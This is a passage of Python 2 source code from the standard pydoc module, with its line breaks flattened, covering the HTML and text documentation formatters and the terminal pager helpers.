occur before or after the module was found? (exc, value, tb) = info = sys.exc_info() if path in sys.modules: # An error occurred while executing the imported module. raise ErrorDuringImport(sys.modules[path].__file__, info) elif exc is SyntaxError: # A SyntaxError occurred before we could execute the module. raise ErrorDuringImport(value.filename, info) elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport': # The import error occurred directly in this function, # which means there is no such module in the path. return None else: # Some other error occurred during the importing process. raise ErrorDuringImport(path, sys.exc_info()) for part in split(path, '.')[1:]: try: module = getattr(module, part) except AttributeError: return None return module # ---------------------------------------------------- formatter base class class Doc: def document(self, object, name=None, *args): """Generate documentation for an object.""" args = (object, name) + args # 'try' clause is to attempt to handle the possibility that inspect # identifies something in a way that pydoc itself has issues handling; # think 'super' and how it is a descriptor (which raises the exception # by lacking a __name__ attribute) and an instance. if inspect.isgetsetdescriptor(object): return self.docdata(*args) if inspect.ismemberdescriptor(object): return self.docdata(*args) try: if inspect.ismodule(object): return self.docmodule(*args) if inspect.isclass(object): return self.docclass(*args) if inspect.isroutine(object): return self.docroutine(*args) except AttributeError: pass if isinstance(object, property): return self.docproperty(*args) return self.docother(*args) def fail(self, object, name=None, *args): """Raise an exception for unimplemented types.""" message = "don't know how to document object%s of type %s" % ( name and ' ' + repr(name), type(object).__name__) raise TypeError, message docmodule = docclass = docroutine = docother = docproperty = docdata = fail def getdocloc(self, object, basedir=os.path.join(sys.exec_prefix, "lib", "python"+sys.version[0:3])): """Return the location of module docs or None""" try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' docloc = os.environ.get("PYTHONDOCS", "https://docs.python.org/library") basedir = os.path.normcase(basedir) if (isinstance(object, type(os)) and (object.__name__ in ('errno', 'exceptions', 'gc', 'imp', 'marshal', 'posix', 'signal', 'sys', 'thread', 'zipimport') or (file.startswith(basedir) and not file.startswith(os.path.join(basedir, 'site-packages')))) and object.__name__ not in ('xml.etree', 'test.pydoc_mod')): if docloc.startswith(("http://", "https://")): docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__.lower()) else: docloc = os.path.join(docloc, object.__name__.lower() + ".html") else: docloc = None return docloc # -------------------------------------------- HTML documentation generator class HTMLRepr(Repr): """Class for safely making an HTML representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def escape(self, text): return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;') def repr(self, object): return Repr.repr(self, object) def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if hasattr(self, methodname): return getattr(self, methodname)(x, level) return self.escape(cram(stripid(repr(x)), self.maxother)) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + self.escape(test) + testrepr[0] return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)', r'<font color="#c040c0">\1</font>', self.escape(testrepr)) repr_str = repr_string def repr_instance(self, x, level): try: return self.escape(cram(stripid(repr(x)), self.maxstring)) except: return self.escape('<%s instance>' % x.__class__.__name__) repr_unicode = repr_string class HTMLDoc(Doc): """Formatter class for HTML documentation.""" # ------------------------------------------- HTML formatting utilities _repr_instance = HTMLRepr() repr = _repr_instance.repr escape = _repr_instance.escape def page(self, title, contents): """Format an HTML page.""" return _encode(''' <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html><head><title>Python: %s</title> <meta charset="utf-8"> </head><body bgcolor="#f0f0f8"> %s </body></html>''' % (title, contents), 'ascii') def heading(self, title, fgcol, bgcol, extras=''): """Format a page heading.""" return ''' <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading"> <tr bgcolor="%s"> <td valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td ><td align=right valign=bottom ><font color="%s" face="helvetica, arial">%s</font></td></tr></table> ''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;') def section(self, title, fgcol, bgcol, contents, width=6, prelude='', marginalia=None, gap='&nbsp;'): """Format a section with a heading.""" if marginalia is None: marginalia = '<tt>' + '&nbsp;' * width + '</tt>' result = '''<p> <table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section"> <tr bgcolor="%s"> <td colspan=3 valign=bottom>&nbsp;<br> <font color="%s" face="helvetica, arial">%s</font></td></tr> ''' % (bgcol, fgcol, title) if prelude: result = result + ''' <tr bgcolor="%s"><td rowspan=2>%s</td> <td colspan=2>%s</td></tr> <tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap) else: result = result + ''' <tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap) return result + '\n<td width="100%%">%s</td></tr></table>' % contents def bigsection(self, title, *args): """Format a section with a big heading.""" title = '<big><strong>%s</strong></big>' % title return self.section(title, *args) def preformat(self, text): """Format literal preformatted text.""" text = self.escape(expandtabs(text)) return replace(text, '\n\n', '\n \n', '\n\n', '\n \n', ' ', '&nbsp;', '\n', '<br>\n') def multicolumn(self, list, format, cols=4): """Format a list of items into a multi-column list.""" result = '' rows = (len(list)+cols-1)//cols for col in range(cols): result = result + '<td width="%d%%" valign=top>' % (100//cols) for i in range(rows*col, rows*col+rows): if i < len(list): result = result + format(list[i]) + '<br>\n' result = result + '</td>' return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result def grey(self, text): return '<font color="#909090">%s</font>' % text def namelink(self, name, *dicts): """Make a link for an identifier, given name-to-URL mappings.""" for dict in dicts: if name in dict: return '<a href="%s">%s</a>' % (dict[name], name) return name def classlink(self, object, modname): """Make a link for a class.""" name, module = object.__name__, sys.modules.get(object.__module__) if hasattr(module, name) and getattr(module, name) is object: return '<a href="%s.html#%s">%s</a>' % ( module.__name__, name, classname(object, modname)) return classname(object, modname) def modulelink(self, object): """Make a link for a module.""" return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__) def modpkglink(self, data): """Make a link for a module or package to display in an index.""" name, path, ispackage, shadowed = data if shadowed: return self.grey(name) if path: url = '%s.%s.html' % (path, name) else: url = '%s.html' % name if ispackage: text = '<strong>%s</strong>&nbsp;(package)' % name else: text = name return '<a href="%s">%s</a>' % (url, text) def markup(self, text, escape=None, funcs={}, classes={}, methods={}): """Mark up some plain text, given a context of symbols to look for. Each context dictionary maps object names to anchor names.""" escape = escape or self.escape results = [] here = 0 pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|' r'RFC[- ]?(\d+)|' r'PEP[- ]?(\d+)|' r'(self\.)?(\w+))') while True: match = pattern.search(text, here) if not match: break start, end = match.span() results.append(escape(text[here:start])) all, scheme, rfc, pep, selfdot, name = match.groups() if scheme: url = escape(all).replace('"', '&quot;') results.append('<a href="%s">%s</a>' % (url, url)) elif rfc: url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif pep: url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep) results.append('<a href="%s">%s</a>' % (url, escape(all))) elif selfdot: # Create a link for methods like 'self.method(...)' # and use <strong> for attributes like 'self.attr' if text[end:end+1] == '(': results.append('self.' + self.namelink(name, methods)) else: results.append('self.<strong>%s</strong>' % name) elif text[end:end+1] == '(': results.append(self.namelink(name, methods, funcs, classes)) else: results.append(self.namelink(name, classes)) here = end results.append(escape(text[here:])) return join(results, '') # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None): """Produce HTML for a class tree as given by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + '<dt><font face="helvetica, arial">' result = result + self.classlink(c, modname) if bases and bases != (parent,): parents = [] for base in bases: parents.append(self.classlink(base, modname)) result = result + '(' + join(parents, ', ') + ')' result = result + '\n</font></dt>' elif type(entry) is type([]): result = result + '<dd>\n%s</dd>\n' % self.formattree( entry, modname, c) return '<dl>\n%s</dl>\n' % result def docmodule(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a module object.""" name = object.__name__ # ignore the passed-in name try: all = object.__all__ except AttributeError: all = None parts = split(name, '.') links = [] for i in range(len(parts)-1): links.append( '<a href="%s.html"><font color="#ffffff">%s</font></a>' % (join(parts[:i+1], '.'), parts[i])) linkedname = join(links + parts[-1:], '.') head = '<big><big><strong>%s</strong></big></big>' % linkedname try: path = inspect.getabsfile(object) url = path if sys.platform == 'win32': import nturl2path url = nturl2path.pathname2url(path) filelink = '<a href="file:%s">%s</a>' % (url, path) except TypeError: filelink = '(built-in)' info = [] if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) info.append('version %s' % self.escape(version)) if hasattr(object, '__date__'): info.append(self.escape(_binstr(object.__date__))) if info: head = head + ' (%s)' % join(info, ', ') docloc = self.getdocloc(object) if docloc is not None: docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals() else: docloc = '' result = self.heading( head, '#ffffff', '#7799ee', '<a href=".">index</a><br>' + filelink + docloc) modules = inspect.getmembers(object, inspect.ismodule) classes, cdict = [], {} for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) cdict[key] = cdict[value] = '#' + key for key, value in classes: for base in value.__bases__: key, modname = base.__name__, base.__module__ module = sys.modules.get(modname) if modname != name and module and hasattr(module, key): if getattr(module, key) is base: if not key in cdict: cdict[key] = cdict[base] = modname + '.html#' + key funcs, fdict = [], {} for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) fdict[key] = '#-' + key if inspect.isfunction(value): fdict[value] = fdict[key] data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) doc = self.markup(getdoc(object), self.preformat, fdict, cdict) doc = doc and '<tt>%s</tt>' % doc result = result + '<p>%s</p>\n' % doc if hasattr(object, '__path__'): modpkgs = [] for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs.append((modname, name, ispkg, 0)) modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) result = result + self.bigsection( 'Package Contents', '#ffffff', '#aa55cc', contents) elif modules: contents = self.multicolumn( modules, lambda key_value, s=self: s.modulelink(key_value[1])) result = result + self.bigsection( 'Modules', '#ffffff', '#aa55cc', contents) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [ self.formattree(inspect.getclasstree(classlist, 1), name)] for key, value in classes: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Classes', '#ffffff', '#ee77aa', join(contents)) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name, fdict, cdict)) result = result + self.bigsection( 'Functions', '#ffffff', '#eeaa77', join(contents)) if data: contents = [] for key, value in data: contents.append(self.document(value, key)) result = result + self.bigsection( 'Data', '#ffffff', '#55aa55', join(contents, '<br>\n')) if hasattr(object, '__author__'): contents = self.markup(_binstr(object.__author__), self.preformat) result = result + self.bigsection( 'Author', '#ffffff', '#7799ee', contents) if hasattr(object, '__credits__'): contents = self.markup(_binstr(object.__credits__), self.preformat) result = result + self.bigsection( 'Credits', '#ffffff', '#7799ee', contents) return result def docclass(self, object, name=None, mod=None, funcs={}, classes={}, *ignored): """Produce HTML documentation for a class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ contents = [] push = contents.append # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('<hr>\n') self.needone = 1 hr = HorizontalRule() # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: hr.maybe() push('<dl><dt>Method resolution order:</dt>\n') for base in mro: push('<dd>%s</dd>\n' % self.classlink(base, object.__module__)) push('</dl>\n') def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, funcs, classes, mdict, object)) push('\n') return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: base = self.docother(getattr(object, name), name, mod) if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getattr(value, "__doc__", None) else: doc = None if doc is None: push('<dl><dt>%s</dl>\n' % base) else: doc = self.markup(getdoc(value), self.preformat, funcs, classes, mdict) doc = '<dd><tt>%s</tt>' % doc push('<dl><dt>%s%s</dl>\n' % (base, doc)) push('\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) mdict = {} for key, kind, homecls, value in attrs: mdict[key] = anchor = '#' + name + '-' + key try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) pass try: # The value may not be hashable (e.g., a data attr with # a dict or list value). mdict[value] = anchor except TypeError: pass while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = 'defined here' else: tag = 'inherited from %s' % self.classlink(thisclass, object.__module__) tag += ':<br>\n' # Sort attrs by name. try: attrs.sort(key=lambda t: t[0]) except TypeError: attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat # Pump out the attrs, segregated by kind. attrs = spill('Methods %s' % tag, attrs, lambda t: t[1] == 'method') attrs = spill('Class methods %s' % tag, attrs, lambda t: t[1] == 'class method') attrs = spill('Static methods %s' % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors('Data descriptors %s' % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata('Data and other attributes %s' % tag, attrs, lambda t: t[1] == 'data') assert attrs == [] attrs = inherited contents = ''.join(contents) if name == realname: title = '<a name="%s">class <strong>%s</strong></a>' % ( name, realname) else: title = '<strong>%s</strong> = <a name="%s">class %s</a>' % ( name, name, realname) if bases: parents = [] for base in bases: parents.append(self.classlink(base, object.__module__)) title = title + '(%s)' % join(parents, ', ') doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict) doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc return self.section(title, '#000000', '#ffc8d8', contents, 3, doc) def formatvalue(self, object): """Format an argument default value as text.""" return self.grey('=' + self.repr(object)) def docroutine(self, object, name=None, mod=None, funcs={}, classes={}, methods={}, cl=None): """Produce HTML documentation for a function or method object.""" realname = object.__name__ name = name or realname anchor = (cl and cl.__name__ or '') + '-' + name note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + self.classlink(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % self.classlink( object.im_self.__class__, mod) else: note = ' unbound %s method' % self.classlink(imclass,mod) object = object.im_func if name == realname: title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): reallink = '<a href="#%s">%s</a>' % ( cl.__name__ + '-' + realname, realname) skipdocs = 1 else: reallink = realname title = '<a name="%s"><strong>%s</strong></a> = %s' % ( anchor, name, reallink) if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = '<strong>%s</strong> <em>lambda</em> ' % name argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + (note and self.grey( '<font face="helvetica, arial">%s</font>' % note)) if skipdocs: return '<dl><dt>%s</dt></dl>\n' % decl else: doc = self.markup( getdoc(object), self.preformat, funcs, classes, methods) doc = doc and '<dd><tt>%s</tt></dd>' % doc return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc) def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push('<dl><dt><strong>%s</strong></dt>\n' % name) if value.__doc__ is not None: doc = self.markup(getdoc(value), self.preformat) push('<dd><tt>%s</tt></dd>\n' % doc) push('</dl>\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce html documentation for a property.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, *ignored): """Produce HTML documentation for a data object.""" lhs = name and '<strong>%s</strong> = ' % name or '' return lhs + self.repr(object) def docdata(self, object, name=None, mod=None, cl=None): """Produce html documentation for a data descriptor.""" return self._docdescriptor(name, object, mod) def index(self, dir, shadowed=None): """Generate an HTML index for a directory of modules.""" modpkgs = [] if shadowed is None: shadowed = {} for importer, name, ispkg in pkgutil.iter_modules([dir]): modpkgs.append((name, '', ispkg, name in shadowed)) shadowed[name] = 1 modpkgs.sort() contents = self.multicolumn(modpkgs, self.modpkglink) return self.bigsection(dir, '#ffffff', '#ee77aa', contents) # -------------------------------------------- text documentation generator class TextRepr(Repr): """Class for safely making a text representation of a Python object.""" def __init__(self): Repr.__init__(self) self.maxlist = self.maxtuple = 20 self.maxdict = 10 self.maxstring = self.maxother = 100 def repr1(self, x, level): if hasattr(type(x), '__name__'): methodname = 'repr_' + join(split(type(x).__name__), '_') if hasattr(self, methodname): return getattr(self, methodname)(x, level) return cram(stripid(repr(x)), self.maxother) def repr_string(self, x, level): test = cram(x, self.maxstring) testrepr = repr(test) if '\\' in test and '\\' not in replace(testrepr, r'\\', ''): # Backslashes are only literal in the string and are never # needed to make any special characters, so show a raw string. return 'r' + testrepr[0] + test + testrepr[0] return testrepr repr_str = repr_string def repr_instance(self, x, level): try: return cram(stripid(repr(x)), self.maxstring) except: return '<%s instance>' % x.__class__.__name__ class TextDoc(Doc): """Formatter class for text documentation.""" # ------------------------------------------- text formatting utilities _repr_instance = TextRepr() repr = _repr_instance.repr def bold(self, text): """Format a string in bold by overstriking.""" return join(map(lambda ch: ch + '\b' + ch, text), '') def indent(self, text, prefix=' '): """Indent text by prepending a given prefix to each line.""" if not text: return '' lines = split(text, '\n') lines = map(lambda line, prefix=prefix: prefix + line, lines) if lines: lines[-1] = rstrip(lines[-1]) return join(lines, '\n') def section(self, title, contents): """Format a section with a given heading.""" return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n' # ---------------------------------------------- type-specific routines def formattree(self, tree, modname, parent=None, prefix=''): """Render in text a class tree as returned by inspect.getclasstree().""" result = '' for entry in tree: if type(entry) is type(()): c, bases = entry result = result + prefix + classname(c, modname) if bases and bases != (parent,): parents = map(lambda c, m=modname: classname(c, m), bases) result = result + '(%s)' % join(parents, ', ') result = result + '\n' elif type(entry) is type([]): result = result + self.formattree( entry, modname, c, prefix + ' ') return result def docmodule(self, object, name=None, mod=None): """Produce text documentation for a given module object.""" name = object.__name__ # ignore the passed-in name synop, desc = splitdoc(getdoc(object)) result = self.section('NAME', name + (synop and ' - ' + synop)) try: all = object.__all__ except AttributeError: all = None try: file = inspect.getabsfile(object) except TypeError: file = '(built-in)' result = result + self.section('FILE', file) docloc = self.getdocloc(object) if docloc is not None: result = result + self.section('MODULE DOCS', docloc) if desc: result = result + self.section('DESCRIPTION', desc) classes = [] for key, value in inspect.getmembers(object, inspect.isclass): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or (inspect.getmodule(value) or object) is object): if visiblename(key, all, object): classes.append((key, value)) funcs = [] for key, value in inspect.getmembers(object, inspect.isroutine): # if __all__ exists, believe it. Otherwise use old heuristic. if (all is not None or inspect.isbuiltin(value) or inspect.getmodule(value) is object): if visiblename(key, all, object): funcs.append((key, value)) data = [] for key, value in inspect.getmembers(object, isdata): if visiblename(key, all, object): data.append((key, value)) modpkgs = [] modpkgs_names = set() if hasattr(object, '__path__'): for importer, modname, ispkg in pkgutil.iter_modules(object.__path__): modpkgs_names.add(modname) if ispkg: modpkgs.append(modname + ' (package)') else: modpkgs.append(modname) modpkgs.sort() result = result + self.section( 'PACKAGE CONTENTS', join(modpkgs, '\n')) # Detect submodules as sometimes created by C extensions submodules = [] for key, value in inspect.getmembers(object, inspect.ismodule): if value.__name__.startswith(name + '.') and key not in modpkgs_names: submodules.append(key) if submodules: submodules.sort() result = result + self.section( 'SUBMODULES', join(submodules, '\n')) if classes: classlist = map(lambda key_value: key_value[1], classes) contents = [self.formattree( inspect.getclasstree(classlist, 1), name)] for key, value in classes: contents.append(self.document(value, key, name)) result = result + self.section('CLASSES', join(contents, '\n')) if funcs: contents = [] for key, value in funcs: contents.append(self.document(value, key, name)) result = result + self.section('FUNCTIONS', join(contents, '\n')) if data: contents = [] for key, value in data: contents.append(self.docother(value, key, name, maxlen=70)) result = result + self.section('DATA', join(contents, '\n')) if hasattr(object, '__version__'): version = _binstr(object.__version__) if version[:11] == '$' + 'Revision: ' and version[-1:] == '$': version = strip(version[11:-1]) result = result + self.section('VERSION', version) if hasattr(object, '__date__'): result = result + self.section('DATE', _binstr(object.__date__)) if hasattr(object, '__author__'): result = result + self.section('AUTHOR', _binstr(object.__author__)) if hasattr(object, '__credits__'): result = result + self.section('CREDITS', _binstr(object.__credits__)) return result def docclass(self, object, name=None, mod=None, *ignored): """Produce text documentation for a given class object.""" realname = object.__name__ name = name or realname bases = object.__bases__ def makename(c, m=object.__module__): return classname(c, m) if name == realname: title = 'class ' + self.bold(realname) else: title = self.bold(name) + ' = class ' + realname if bases: parents = map(makename, bases) title = title + '(%s)' % join(parents, ', ') doc = getdoc(object) contents = doc and [doc + '\n'] or [] push = contents.append # List the mro, if non-trivial. mro = deque(inspect.getmro(object)) if len(mro) > 2: push("Method resolution order:") for base in mro: push(' ' + makename(base)) push('') # Cute little class to pump out a horizontal rule between sections. class HorizontalRule: def __init__(self): self.needone = 0 def maybe(self): if self.needone: push('-' * 70) self.needone = 1 hr = HorizontalRule() def spill(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: try: value = getattr(object, name) except Exception: # Some descriptors may meet a failure in their __get__. # (bug #1785) push(self._docdescriptor(name, value, mod)) else: push(self.document(value, name, mod, object)) return attrs def spilldescriptors(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: push(self._docdescriptor(name, value, mod)) return attrs def spilldata(msg, attrs, predicate): ok, attrs = _split_list(attrs, predicate) if ok: hr.maybe() push(msg) for name, kind, homecls, value in ok: if (hasattr(value, '__call__') or inspect.isdatadescriptor(value)): doc = getdoc(value) else: doc = None push(self.docother(getattr(object, name), name, mod, maxlen=70, doc=doc) + '\n') return attrs attrs = filter(lambda data: visiblename(data[0], obj=object), classify_class_attrs(object)) while attrs: if mro: thisclass = mro.popleft() else: thisclass = attrs[0][2] attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass) if thisclass is __builtin__.object: attrs = inherited continue elif thisclass is object: tag = "defined here" else: tag = "inherited from %s" % classname(thisclass, object.__module__) # Sort attrs by name. attrs.sort() # Pump out the attrs, segregated by kind. attrs = spill("Methods %s:\n" % tag, attrs, lambda t: t[1] == 'method') attrs = spill("Class methods %s:\n" % tag, attrs, lambda t: t[1] == 'class method') attrs = spill("Static methods %s:\n" % tag, attrs, lambda t: t[1] == 'static method') attrs = spilldescriptors("Data descriptors %s:\n" % tag, attrs, lambda t: t[1] == 'data descriptor') attrs = spilldata("Data and other attributes %s:\n" % tag, attrs, lambda t: t[1] == 'data') assert attrs == [] attrs = inherited contents = '\n'.join(contents) if not contents: return title + '\n' return title + '\n' + self.indent(rstrip(contents), ' | ') + '\n' def formatvalue(self, object): """Format an argument default value as text.""" return '=' + self.repr(object) def docroutine(self, object, name=None, mod=None, cl=None): """Produce text documentation for a function or method object.""" realname = object.__name__ name = name or realname note = '' skipdocs = 0 if inspect.ismethod(object): imclass = object.im_class if cl: if imclass is not cl: note = ' from ' + classname(imclass, mod) else: if object.im_self is not None: note = ' method of %s instance' % classname( object.im_self.__class__, mod) else: note = ' unbound %s method' % classname(imclass,mod) object = object.im_func if name == realname: title = self.bold(realname) else: if (cl and realname in cl.__dict__ and cl.__dict__[realname] is object): skipdocs = 1 title = self.bold(name) + ' = ' + realname if inspect.isfunction(object): args, varargs, varkw, defaults = inspect.getargspec(object) argspec = inspect.formatargspec( args, varargs, varkw, defaults, formatvalue=self.formatvalue) if realname == '<lambda>': title = self.bold(name) + ' lambda ' argspec = argspec[1:-1] # remove parentheses else: argspec = '(...)' decl = title + argspec + note if skipdocs: return decl + '\n' else: doc = getdoc(object) or '' return decl + '\n' + (doc and rstrip(self.indent(doc)) + '\n') def _docdescriptor(self, name, value, mod): results = [] push = results.append if name: push(self.bold(name)) push('\n') doc = getdoc(value) or '' if doc: push(self.indent(doc)) push('\n') return ''.join(results) def docproperty(self, object, name=None, mod=None, cl=None): """Produce text documentation for a property.""" return self._docdescriptor(name, object, mod) def docdata(self, object, name=None, mod=None, cl=None): """Produce text documentation for a data descriptor.""" return self._docdescriptor(name, object, mod) def docother(self, object, name=None, mod=None, parent=None, maxlen=None, doc=None): """Produce text documentation for a data object.""" repr = self.repr(object) if maxlen: line = (name and name + ' = ' or '') + repr chop = maxlen - len(line) if chop < 0: repr = repr[:chop] + '...' line = (name and self.bold(name) + ' = ' or '') + repr if doc is not None: line += '\n' + self.indent(str(doc)) return line # --------------------------------------------------------- user interfaces def pager(text): """The first time this is called, determine what kind of pager to use.""" global pager pager = getpager() pager(text) def getpager(): """Decide what method to use for paging through text.""" if type(sys.stdout) is not types.FileType: return plainpager if not hasattr(sys.stdin, "isatty"): return plainpager if not sys.stdin.isatty() or not sys.stdout.isatty(): return plainpager if 'PAGER' in os.environ: if sys.platform == 'win32': # pipes completely broken in Windows return lambda text: tempfilepager(plain(text), os.environ['PAGER']) elif os.environ.get('TERM') in ('dumb', 'emacs'): return lambda text: pipepager(plain(text), os.environ['PAGER']) else: return lambda text: pipepager(text, os.environ['PAGER']) if os.environ.get('TERM') in ('dumb', 'emacs'): return plainpager if sys.platform == 'win32' or sys.platform.startswith('os2'): return lambda text: tempfilepager(plain(text), 'more <') if hasattr(os, 'system') and os.system('(less) 2>/dev/null') == 0: return lambda text: pipepager(text, 'less') import tempfile (fd, filename) = tempfile.mkstemp() os.close(fd) try: if hasattr(os, 'system') and os.system('more "%s"' % filename) == 0: return lambda text: pipepager(text, 'more') else: return ttypager finally: os.unlink(filename) def plain(text): """Remove boldface formatting from text.""" return re.sub('.\b', '', text) def pipepager(text, cmd): """Page through text by feeding it to another program.""" pipe = os.popen(cmd, 'w') try: pipe.write(_encode(text)) pipe.close() except IOError: pass # Ignore broken pipes caused by quitting the pager program. def tempfilepager(text, cmd): """Page through text by invoking a program on a temporary file.""" import tempfile filename = tempfile.mktemp() file = open(filename, 'w') file.write(_encode(text)) file.close() try: os.system(cmd + ' "' + filename + '"') finally: os.unlink(filename) def ttypager(text): """Page through text on a text terminal.""" lines = plain(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))).split('\n') try: import tty fd = sys.stdin.fileno() old = tty.tcgetattr(fd) tty.setcbreak(fd) getchar = lambda: sys.stdin.read(1) except (ImportError, AttributeError): tty = None getchar = lambda: sys.stdin.readline()[:-1][:1] try: try: h = int(os.environ.get('LINES', 0)) except ValueError: h = 0 if h <= 1: h = 25 r = inc = h - 1 sys.stdout.write(join(lines[:inc], '\n') + '\n') while lines[r:]: sys.stdout.write('-- more --') sys.stdout.flush() c = getchar() if c in ('q', 'Q'): sys.stdout.write('\r \r') break elif c in ('\r', '\n'): sys.stdout.write('\r \r' + lines[r] + '\n') r = r + 1 continue if c in ('b', 'B', '\x1b'): r = r - inc - inc if r < 0: r = 0 sys.stdout.write('\n' + join(lines[r:r+inc], '\n') + '\n') r = r + inc finally: if tty: tty.tcsetattr(fd, tty.TCSAFLUSH, old) def plainpager(text): """Simply print unformatted text. This is the ultimate fallback.""" sys.stdout.write(_encode(plain(text), getattr(sys.stdout, 'encoding', _encoding))) def describe(thing): """Produce a short description of the given thing.""" if inspect.ismodule(thing): if thing.__name__ in sys.builtin_module_names: return 'built-in module ' + thing.__name__ if hasattr(thing, '__path__'): return 'package ' + thing.__name__ else: return 'module ' + thing.__name__ if inspect.isbuiltin(thing): return 'built-in function ' + thing.__name__ if inspect.isgetsetdescriptor(thing): return 'getset descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.ismemberdescriptor(thing): return 'member descriptor %s.%s.%s' % ( thing.__objclass__.__module__, thing.__objclass__.__name__, thing.__name__) if inspect.isclass(thing): return 'class ' + thing.__name__ if inspect.isfunction(thing): return 'function ' + thing.__name__ if inspect.ismethod(thing): return 'method ' + thing.__name__ if type(thing) is types.InstanceType: return 'instance of ' + thing.__class__.__name__ return type(thing).__name__ def locate(path, forceload=0): """Locate an object by name or dotted path, importing as necessary.""" parts = [part for part in split(path, '.') if part] module, n = None, 0 while n < len(parts): nextmodule = safeimport(join(parts[:n+1], '.'), forceload) if nextmodule: module, n = nextmodule, n + 1 else: break if module: object = module else: object = __builtin__ for part in parts[n:]: try: object = getattr(object, part) except AttributeError: return None return object # --------------------------------------- interactive interpreter interface text = TextDoc() html = HTMLDoc() class _OldStyleClass: pass _OLD_INSTANCE_TYPE = type(_OldStyleClass()) def resolve(thing, 